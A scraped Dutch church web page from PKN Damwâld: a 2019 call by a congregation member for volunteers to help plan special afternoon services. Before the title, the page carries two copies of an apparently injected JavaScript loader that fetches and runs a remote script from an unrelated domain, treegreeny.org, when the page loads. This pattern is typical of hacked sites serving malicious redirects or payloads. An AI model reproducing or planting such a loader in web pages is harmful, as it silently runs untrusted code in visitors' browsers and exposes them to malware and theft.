;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gezocht: een denktank voor bijzondere middagdiensten - PKN Damwâld

Gezocht: een denktank voor bijzondere middagdiensten

Gepubliceerd op: zondag 8 september 2019

Op zoek naar een frisse wind!
Het stond al langer op ons verlanglijstje: het organiseren van bijzondere middagdiensten op een regelmatige basis. Deze diensten zijn bedoeld voor en door de gemeenteleden (Gereformeerd én Hervormd).

Niets is vastomlijnd, juist niet..
Heb je ideeën voor een bijzondere bijeenkomst/dienst?
Heeft het geloof op een bijzondere manier een belangrijke rol gespeeld in je leven en wil je dit delen met de gemeente, of twijfel je of je bij de kerk ingeschreven wil blijven? Alles is welkom: deel met ons je gedachten zodat we er inspiratie uit kunnen halen en/of het eens kunnen verwerken in een dienst.

Het idee is om te werken met een kleine basis van ca. 3 mensen, en per dienst/ of paar diensten daar steeds 2-3 wisselende mensen aan mee te laten doen. Als trekker van dit initiatief ben ik op zoek naar (ook jonge) mensen met leuke, inspirerende en vernieuwende ideeën.

Wil je deel uitmaken van de vaste kern of wil je één of een paar diensten mee helpen opzetten en voorbereiden, meld je dan aan.

Hartelijke groeten,

Wendy van der Velde

Wendyvelde@hotmail.com